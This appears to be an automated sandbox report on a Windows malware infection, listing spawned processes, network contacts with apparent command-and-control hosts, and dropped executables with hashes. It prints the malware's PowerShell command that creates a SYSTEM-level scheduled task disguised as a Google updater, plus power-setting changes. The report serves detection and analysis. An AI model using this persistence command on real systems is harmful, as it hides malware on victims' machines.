C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kfbfjf#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2664 -ip 2664

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 2380

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Users\Admin\AppData\Local\Temp\1000357001\e0cbefcb1af40c7d4aff4aca26621a98.exe

"C:\Users\Admin\AppData\Local\Temp\1000357001\e0cbefcb1af40c7d4aff4aca26621a98.exe"

C:\Users\Admin\AppData\Local\Temp\orm6k3UPjyk7pHiE6lmOcRAp.exe

"C:\Users\Admin\AppData\Local\Temp\orm6k3UPjyk7pHiE6lmOcRAp.exe"

C:\Users\Admin\AppData\Local\50678fd5-df62-4d8b-810d-d2a8ed16a1f1\xXyQiNG_qhmki3RUDDNIRPh8.exe

C:\Users\Admin\AppData\Local\50678fd5-df62-4d8b-810d-d2a8ed16a1f1\xXyQiNG_qhmki3RUDDNIRPh8.exe --Task

C:\Users\Admin\AppData\Local\Temp\5D01.exe

C:\Users\Admin\AppData\Local\Temp\5D01.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B880.bat" "

C:\Windows\system32\sihost.exe

sihost.exe

C:\Users\Admin\AppData\Local\Temp\1000358001\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\1000358001\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\5D01.exe

C:\Users\Admin\AppData\Local\Temp\5D01.exe

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D7D0.bat" "

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000dc 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000fc 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000dc 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000b4 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000dc 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000c4 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 0000011c 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000b4 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 0000011c 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000dc 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 00000100 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 00000110 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000f8 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 00000108 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 0000011c 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000dc 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000dc 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000f8 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 0000011c 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000f8 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 0000011c 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 00000100 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000ec 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000ec 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 00000134 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 00000108 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 0000011c 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000b4 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000c4 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 0000025c 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 00000298 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 00000370 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000001f8 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000001e4 00000084

Network

Country Destination Domain Proto
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
BG 193.42.32.118:80 193.42.32.118 tcp
US 8.8.8.8:53 api.myip.com udp
US 172.67.75.163:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 118.32.42.193.in-addr.arpa udp
US 8.8.8.8:53 163.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 vk.com udp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:443 vk.com tcp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 194.225.186.93.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 226.21.18.104.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
BG 171.22.28.226:80 171.22.28.226 tcp
NL 194.169.175.232:80 194.169.175.232 tcp
US 8.8.8.8:53 onualituyrs.org udp
FI 77.91.68.249:80 77.91.68.249 tcp
NL 185.225.74.144:80 185.225.74.144 tcp
RU 91.215.85.209:80 onualituyrs.org tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
US 8.8.8.8:53 jackantonio.top udp
DE 45.132.1.20:80 jackantonio.top tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
DE 45.132.1.20:80 jackantonio.top tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
US 8.8.8.8:53 226.28.22.171.in-addr.arpa udp
US 8.8.8.8:53 232.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 249.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 144.74.225.185.in-addr.arpa udp
US 8.8.8.8:53 209.85.215.91.in-addr.arpa udp
US 8.8.8.8:53 20.1.132.45.in-addr.arpa udp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:443 vk.com tcp
RU 93.186.225.194:443 vk.com tcp
RU 93.186.225.194:443 vk.com tcp
US 8.8.8.8:53 sun6-23.userapi.com udp
RU 95.142.206.3:443 sun6-23.userapi.com tcp
RU 93.186.225.194:443 vk.com tcp
RU 95.142.206.3:443 sun6-23.userapi.com tcp
RU 93.186.225.194:443 vk.com tcp
US 8.8.8.8:53 3.206.142.95.in-addr.arpa udp
RU 93.186.225.194:443 vk.com tcp
US 8.8.8.8:53 sun6-20.userapi.com udp
RU 95.142.206.0:443 sun6-20.userapi.com tcp
US 8.8.8.8:53 sun6-21.userapi.com udp
RU 93.186.225.194:443 vk.com tcp
RU 95.142.206.1:443 sun6-21.userapi.com tcp
RU 93.186.225.194:443 vk.com tcp
US 8.8.8.8:53 sun6-22.userapi.com udp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:443 vk.com tcp
RU 95.142.206.2:443 sun6-22.userapi.com tcp
US 8.8.8.8:53 0.206.142.95.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 1.206.142.95.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 2.206.142.95.in-addr.arpa udp
NL 185.225.74.144:80 185.225.74.144 tcp
RU 91.215.85.209:443 onualituyrs.org tcp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
BG 193.42.32.118:80 193.42.32.118 tcp
NL 45.15.156.229:80 45.15.156.229 tcp
US 8.8.8.8:53 api.myip.com udp
US 104.26.9.59:443 api.myip.com tcp
US 8.8.8.8:53 229.156.15.45.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 59.9.26.104.in-addr.arpa udp
US 8.8.8.8:53 iplis.ru udp
DE 148.251.234.93:443 iplis.ru tcp
US 8.8.8.8:53 iplogger.org udp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 83.234.251.148.in-addr.arpa udp
NL 45.15.156.229:80 45.15.156.229 tcp
NL 194.169.175.128:50500 tcp
US 8.8.8.8:53 api.2ip.ua udp
US 8.8.8.8:53 telegram.org udp
US 188.114.97.0:443 api.2ip.ua tcp
NL 149.154.167.99:443 telegram.org tcp
US 8.8.8.8:53 elijahdiego.top udp
US 8.8.8.8:53 128.175.169.194.in-addr.arpa udp
DE 45.132.1.20:80 elijahdiego.top tcp
US 8.8.8.8:53 vk.com udp
RU 93.186.225.194:80 vk.com tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
NL 194.169.175.128:50505 tcp
RU 93.186.225.194:80 vk.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
DE 45.132.1.20:80 elijahdiego.top tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:443 vk.com tcp
DE 45.132.1.20:80 elijahdiego.top tcp
US 8.8.8.8:53 35.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 db-ip.com udp
US 104.26.4.15:443 db-ip.com tcp
DE 45.132.1.20:80 elijahdiego.top tcp
US 8.8.8.8:53 15.4.26.104.in-addr.arpa udp
NL 45.15.156.229:80 45.15.156.229 tcp
DE 45.132.1.20:80 elijahdiego.top tcp
BG 193.42.32.118:80 193.42.32.118 tcp
US 8.8.8.8:53 www.maxmind.com udp
US 104.18.145.235:80 www.maxmind.com tcp
US 8.8.8.8:53 235.145.18.104.in-addr.arpa udp
US 8.8.8.8:53 api.myip.com udp
US 104.26.9.59:443 api.myip.com tcp
RU 93.186.225.194:80 vk.com tcp
DE 45.9.74.80:80 45.9.74.80 tcp
US 104.18.145.235:443 www.maxmind.com tcp
US 8.8.8.8:53 80.74.9.45.in-addr.arpa udp
RU 93.186.225.194:80 vk.com tcp
US 34.117.59.81:443 ipinfo.io tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:443 vk.com tcp
US 8.8.8.8:53 sun6-21.userapi.com udp
RU 95.142.206.1:443 sun6-21.userapi.com tcp
DE 45.132.1.20:80 elijahdiego.top tcp
DE 45.132.1.20:80 elijahdiego.top tcp
DE 45.132.1.20:80 elijahdiego.top tcp
DE 45.132.1.20:80 elijahdiego.top tcp
NL 185.225.75.171:22233 tcp
US 8.8.8.8:53 171.75.225.185.in-addr.arpa udp
US 8.8.8.8:53 twitter.com udp
US 104.244.42.129:443 twitter.com tcp
DE 45.132.1.20:80 elijahdiego.top tcp
US 8.8.8.8:53 129.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 7.173.189.20.in-addr.arpa udp
NL 194.169.175.128:50505 tcp
RU 5.255.255.70:443 yandex.ru tcp
NL 45.15.156.229:80 45.15.156.229 tcp
DE 45.132.1.20:80 elijahdiego.top tcp
US 8.8.8.8:53 70.255.255.5.in-addr.arpa udp
US 8.8.8.8:53 dzen.ru udp
RU 62.217.160.2:443 dzen.ru tcp
US 8.8.8.8:53 2.160.217.62.in-addr.arpa udp
DE 45.132.1.20:80 elijahdiego.top tcp
DE 45.132.1.20:80 elijahdiego.top tcp
US 8.8.8.8:53 google.com udp
NL 142.250.179.142:443 google.com tcp
DE 45.9.74.80:80 45.9.74.80 tcp
DE 45.132.1.20:80 elijahdiego.top tcp
US 8.8.8.8:53 142.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 38.148.119.40.in-addr.arpa udp
US 8.8.8.8:53 api.2ip.ua udp
US 188.114.97.0:443 api.2ip.ua tcp
US 8.8.8.8:53 galandskiyher5.com udp
NL 194.169.175.127:80 galandskiyher5.com tcp
DE 45.132.1.20:80 elijahdiego.top tcp
US 8.8.8.8:53 127.175.169.194.in-addr.arpa udp
DE 45.132.1.20:80 elijahdiego.top tcp
US 8.8.8.8:53 foxandcatbet.org udp
US 104.21.71.26:443 foxandcatbet.org tcp
DE 45.132.1.20:80 elijahdiego.top tcp
US 8.8.8.8:53 zexeq.com udp
AR 190.224.203.37:80 zexeq.com tcp
US 8.8.8.8:53 26.71.21.104.in-addr.arpa udp
US 8.8.8.8:53 rangeroverfan.org udp
DE 45.132.1.20:80 elijahdiego.top tcp
US 188.114.96.0:443 rangeroverfan.org tcp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 37.203.224.190.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
DE 45.132.1.20:80 elijahdiego.top tcp
US 8.8.8.8:53 telegram.org udp
NL 149.154.167.99:443 telegram.org tcp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
DE 45.132.1.20:80 elijahdiego.top tcp
RU 79.137.192.18:80 79.137.192.18 tcp
US 104.244.42.129:443 twitter.com tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 18.192.137.79.in-addr.arpa udp
US 8.8.8.8:53 host-host-file8.com udp
NL 194.169.175.127:80 host-host-file8.com tcp
NL 194.169.175.127:80 host-host-file8.com tcp
BG 193.42.32.118:80 193.42.32.118 tcp
US 8.8.8.8:53 colisumy.com udp
SA 93.112.205.101:80 colisumy.com tcp
US 8.8.8.8:53 101.205.112.93.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
NL 194.169.175.127:80 host-host-file8.com tcp
US 8.8.8.8:53 db-ip.com udp
US 104.26.4.15:443 db-ip.com tcp
NL 194.169.175.127:80 host-host-file8.com tcp
US 104.26.4.15:443 db-ip.com tcp
NL 194.169.175.127:80 host-host-file8.com tcp
US 8.8.8.8:53 mikolyda.beget.tech udp
NL 194.169.175.127:80 host-host-file8.com tcp
US 8.8.8.8:53 www.maxmind.com udp
RU 91.106.207.50:80 mikolyda.beget.tech tcp
US 104.18.145.235:80 www.maxmind.com tcp
NL 194.169.175.127:80 host-host-file8.com tcp
US 8.8.8.8:53 hoffmanlevi.space udp
RU 45.130.41.106:443 hoffmanlevi.space tcp
US 104.18.145.235:443 www.maxmind.com tcp
US 8.8.8.8:53 50.207.106.91.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
NL 194.169.175.127:80 host-host-file8.com tcp
US 8.8.8.8:53 106.41.130.45.in-addr.arpa udp
NL 194.169.175.127:80 host-host-file8.com tcp
NL 194.169.175.127:80 host-host-file8.com tcp

Files

memory/4360-0-0x00007FF76B6E0000-0x00007FF76BD7B000-memory.dmp

C:\Users\Admin\Pictures\Minor Policy\GYEKGY13K8dTfwFO8xyTbSdv.exe

MD5 d852aed84489b36f5d6b0f6a075cafd6
SHA1 73a175bbf684f85881b6d27d3551d0d6e734d6df
SHA256 9d1e08892c14289ddbc966d9f1da12c36d9e21b2c8803532819e0e048c4c6274
SHA512 dea771a5502bee275531da3634775433eff6fefdce2c4ddceb8762b95efc6718edcc714eac705481109acd8c6ef9c139b3ad7e91e6723d38203b0d9995746ad4

C:\Users\Admin\Pictures\Minor Policy\Sl8K3MmxSZl_u_goFzCerY2j.exe

MD5 43ec75c9ffaffce00caa878964879e69
SHA1 712403fd77165ee5a6f32ceb7193a4c7a1b8a9dc
SHA256 3e76dd751a3bac77054c7bc6f4728959f2fb68221200c9b10e93332163fb0086
SHA512 09672565a7df3db63a0a817d684c0d27da4370a7b06469123fb353eedb1bba25bda0786a676bf042b26bf952ff06e845106177f65afbe7bf33b6b926c230439d

C:\Users\Admin\Pictures\Minor Policy\78mCmut1q31KKLEjZwPM_IRi.exe

MD5 b9a096baebdf8e44368e9724da8e56dd
SHA1 f9873fa92ae8b75e23e353f43ae1ba9087edebfc
SHA256 2157d146a890d32c5ba49f31fa1840e5b0d56e4dd0bbf5f8b14cc4e482a47bef
SHA512 f17ee70d827fba12de17062add350df0803009e5b930a0f0a7891e6bf64f0df8f443355ec72ae332aed3b37d24f40c78e0a559040e45994e02e3a5ad71624b08

C:\Users\Admin\Pictures\Minor Policy\SWE1hAZdlhK298cTBGrRTAJb.exe

MD5 5aa38295da76c7810a946e570d8fe083
SHA1 e308b69c06c2655f8aa1f550dfaef9388163963a
SHA256 78e6096326c837b23be4519087c4f920a0e5c0b3dca3a407e926a8d3940bde2f
SHA512 e4b610bb3c5e6ed7a93323e9e248f7de81dd4d7a61fe2896cc25e30924217f1d9519409c76118a47acb99ad46d1c2ed3893164dd3e883402b1ee725abcd6f8ab

C:\Users\Admin\Pictures\Minor Policy\1K4bTXJtjSJzT8f0Aii8L_sT.exe

MD5 3d683bae0039e46ad50bebf4681785a0
SHA1 e8662a8cf438ec8521d71dc8b431c1ba592bd881
SHA256 e69e93cc1b989513d5bb4660d326f2e9aea09f903781ef9bdcbbbe2c24dbcc58
SHA512 f85f57d9299f4dafc3b5101af37d6f4c57ae8db23fa1a6aa1b2df37ae655d157b16b4177b9f6e45d0497a14b56451d37e123e6225ca4ed44070183d182ad563e

C:\Users\Admin\Pictures\Minor Policy\tTl1gzPB_4b9JiWfXuMkm2sN.exe

MD5 c5b56d5c5ece675e6aedc3cc44c857ea
SHA1 2565cfabd6bbc86020daca304a6b6531659e8194
SHA256 a04602dfe3459cffdf5744369b5dd994823dbd609f04509733fccbbf56e40bd1
SHA512 9ee956b3559b6235d98b2264d900dd918ca985fd7cd07982a7dde1792f2499146202e49f6cb2896c6455436b20f0d3238ee3cc4d1e6d333842f6bffadc7c4e56

C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe

MD5 15a8142992786ff28bb79fb2b7d47f6e
SHA1 c5fb299009599c93fef087734e13f1dc195f8ec1
SHA256 9a203a1f050818238d950b70465e679c6475cf974e7c823d188645ba6aec01ae
SHA512 aba1c44e1e893364a7e9f0f896d205c24949f77a3d0a64dd7883768a5e3ee43771812fe7ec57dcbc39fd218b643f621f11f7738e0c1be2cd647f353b8b245743

C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe

MD5 df71a06b859776129a744f9dbfddc401
SHA1 a8823e2b086fc4c9e5b148ad6cd29f095da05337
SHA256 d2fb526d868cb4488157564ae891059160b4349d550a291398b3d48ae28b2681
SHA512 76fe69a046f470ca013af39c92a40fff7d6b7a7ad236ea9466d87bbdeac3537d2f1a7544ee5eb1bf179506b780ba0c5fc05f45146befbab12bca1144f21362df

C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe

MD5 1c05ce269187a688ceb10901bc39fce3
SHA1 ea0d9e0c5392d6b07770e7e9677660aac4f5387e
SHA256 c0de80877d3bd743ea80f7c8a2f7370a4fd18713e7661049549867ab909f0c98
SHA512 1bc710876b4910f2b54ab56c1288dbb94a2dd1d47c64b27d7ae822438f9db4ee4ef0f63e5b1ddeb9e8008b9ac5f5ae7faa5a300694958dc614dbc7814fbb7cd6

C:\Users\Admin\Pictures\Minor Policy\R6H5DbUMUEorruAu4jSA9yKu.exe

MD5 eede39c7c0198e86a3b75d2b8af77201
SHA1 b4545ddfbf9a70674a3f28aafe7abf7b4828b9f1
SHA256 7d61b2faaa4ca4c6a3ace89ab8a514c1d928492f4e41552b0386ccf7506d6727
SHA512 31698efaf32fca4bacbf7eef3c51b1db1350ea6768c498e859feea0dc610b3fdce8f5f1691279807088aa0a94eb61578bc6082840312dd17f8910ba7dd6f240d

C:\Users\Admin\Pictures\Minor Policy\Etoyonub2P7t2TSIqKjC5Ucj.exe

MD5 6e3bab6e7b0eb009239eb642eb9d1764
SHA1 41e3d97c275cbb297a55f3c157454dc830697fa1
SHA256 2426765453363274d0b6a02eecd38a159738c106104b07f1df252099822a395e
SHA512 0ebab8f1ebe80d2333a32f0f5bb97a80cb2085ce7eebc20d5aa0a35c2d2b24f4515f783565f9871d668740c7dc599b14c8fb1f7ac288a27fe503b4f91c2d3ec0

C:\Users\Admin\Pictures\Minor Policy\9SLvu92aauFEE9PwBtgW5f7X.exe

MD5 487d3214ced555a38e0b13dd37285ade
SHA1 656a5891bff67714d6583c2c2e484b0de721d09c
SHA256 f347898a48829ec52d4bb0e18458cd23ce04f5af5d81c80363fdc15c3b4c77f8
SHA512 3a3ca5578861186b1773f1cf50e6d9ae9dbac0aafa17ad227f65b2593c5a408e50f46aea56d03bc8b85f4500b4228540a1ee0c80644b8f0c4305f0352a0e4163

C:\Users\Admin\Pictures\Minor Policy\GYEKGY13K8dTfwFO8xyTbSdv.exe

MD5 d852aed84489b36f5d6b0f6a075cafd6
SHA1 73a175bbf684f85881b6d27d3551d0d6e734d6df
SHA256 9d1e08892c14289ddbc966d9f1da12c36d9e21b2c8803532819e0e048c4c6274
SHA512 dea771a5502bee275531da3634775433eff6fefdce2c4ddceb8762b95efc6718edcc714eac705481109acd8c6ef9c139b3ad7e91e6723d38203b0d9995746ad4

C:\Users\Admin\Pictures\Minor Policy\Sl8K3MmxSZl_u_goFzCerY2j.exe

MD5 43ec75c9ffaffce00caa878964879e69
SHA1 712403fd77165ee5a6f32ceb7193a4c7a1b8a9dc
SHA256 3e76dd751a3bac77054c7bc6f4728959f2fb68221200c9b10e93332163fb0086
SHA512 09672565a7df3db63a0a817d684c0d27da4370a7b06469123fb353eedb1bba25bda0786a676bf042b26bf952ff06e845106177f65afbe7bf33b6b926c230439d

C:\Users\Admin\Pictures\Minor Policy\SWE1hAZdlhK298cTBGrRTAJb.exe

MD5 5aa38295da76c7810a946e570d8fe083
SHA1 e308b69c06c2655f8aa1f550dfaef9388163963a
SHA256 78e6096326c837b23be4519087c4f920a0e5c0b3dca3a407e926a8d3940bde2f
SHA512 e4b610bb3c5e6ed7a93323e9e248f7de81dd4d7a61fe2896cc25e30924217f1d9519409c76118a47acb99ad46d1c2ed3893164dd3e883402b1ee725abcd6f8ab

C:\Users\Admin\Pictures\Minor Policy\78mCmut1q31KKLEjZwPM_IRi.exe

MD5 b9a096baebdf8e44368e9724da8e56dd
SHA1 f9873fa92ae8b75e23e353f43ae1ba9087edebfc
SHA256 2157d146a890d32c5ba49f31fa1840e5b0d56e4dd0bbf5f8b14cc4e482a47bef
SHA512 f17ee70d827fba12de17062add350df0803009e5b930a0f0a7891e6bf64f0df8f443355ec72ae332aed3b37d24f40c78e0a559040e45994e02e3a5ad71624b08

C:\Users\Admin\Pictures\Minor Policy\GYEKGY13K8dTfwFO8xyTbSdv.exe

MD5 d852aed84489b36f5d6b0f6a075cafd6
SHA1 73a175bbf684f85881b6d27d3551d0d6e734d6df
SHA256 9d1e08892c14289ddbc966d9f1da12c36d9e21b2c8803532819e0e048c4c6274
SHA512 dea771a5502bee275531da3634775433eff6fefdce2c4ddceb8762b95efc6718edcc714eac705481109acd8c6ef9c139b3ad7e91e6723d38203b0d9995746ad4

C:\Users\Admin\Pictures\Minor Policy\Sl8K3MmxSZl_u_goFzCerY2j.exe

MD5 43ec75c9ffaffce00caa878964879e69
SHA1 712403fd77165ee5a6f32ceb7193a4c7a1b8a9dc
SHA256 3e76dd751a3bac77054c7bc6f4728959f2fb68221200c9b10e93332163fb0086
SHA512 09672565a7df3db63a0a817d684c0d27da4370a7b06469123fb353eedb1bba25bda0786a676bf042b26bf952ff06e845106177f65afbe7bf33b6b926c230439d

C:\Users\Admin\Pictures\Minor Policy\SWE1hAZdlhK298cTBGrRTAJb.exe

MD5 5aa38295da76c7810a946e570d8fe083
SHA1 e308b69c06c2655f8aa1f550dfaef9388163963a
SHA256 78e6096326c837b23be4519087c4f920a0e5c0b3dca3a407e926a8d3940bde2f
SHA512 e4b610bb3c5e6ed7a93323e9e248f7de81dd4d7a61fe2896cc25e30924217f1d9519409c76118a47acb99ad46d1c2ed3893164dd3e883402b1ee725abcd6f8ab

C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe

MD5 df71a06b859776129a744f9dbfddc401
SHA1 a8823e2b086fc4c9e5b148ad6cd29f095da05337
SHA256 d2fb526d868cb4488157564ae891059160b4349d550a291398b3d48ae28b2681
SHA512 76fe69a046f470ca013af39c92a40fff7d6b7a7ad236ea9466d87bbdeac3537d2f1a7544ee5eb1bf179506b780ba0c5fc05f45146befbab12bca1144f21362df

C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe

MD5 15a8142992786ff28bb79fb2b7d47f6e
SHA1 c5fb299009599c93fef087734e13f1dc195f8ec1
SHA256 9a203a1f050818238d950b70465e679c6475cf974e7c823d188645ba6aec01ae
SHA512 aba1c44e1e893364a7e9f0f896d205c24949f77a3d0a64dd7883768a5e3ee43771812fe7ec57dcbc39fd218b643f621f11f7738e0c1be2cd647f353b8b245743

C:\Users\Admin\Pictures\Minor Policy\1K4bTXJtjSJzT8f0Aii8L_sT.exe

MD5 3d683bae0039e46ad50bebf4681785a0
SHA1 e8662a8cf438ec8521d71dc8b431c1ba592bd881
SHA256 e69e93cc1b989513d5bb4660d326f2e9aea09f903781ef9bdcbbbe2c24dbcc58
SHA512 f85f57d9299f4dafc3b5101af37d6f4c57ae8db23fa1a6aa1b2df37ae655d157b16b4177b9f6e45d0497a14b56451d37e123e6225ca4ed44070183d182ad563e

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 7cc972a3480ca0a4792dc3379a763572
SHA1 f72eb4124d24f06678052706c542340422307317
SHA256 02ad5d151250848f2cc4b650a351505aa58ac13c50da207cc06295c123ddf5e5
SHA512 ff5f320356e59eaf8f2b7c5a2668541252221be2d9701006fcc64ce802e66eeaf6ecf316d925258eb12ee5b8b7df4f8da075e9524badc0024b55fae639d075b7

C:\Windows\System32\GroupPolicy\Machine\Registry.pol

MD5 cdfd60e717a44c2349b553e011958b85
SHA1 431136102a6fb52a00e416964d4c27089155f73b
SHA256 0ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f
SHA512 dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 7cc972a3480ca0a4792dc3379a763572
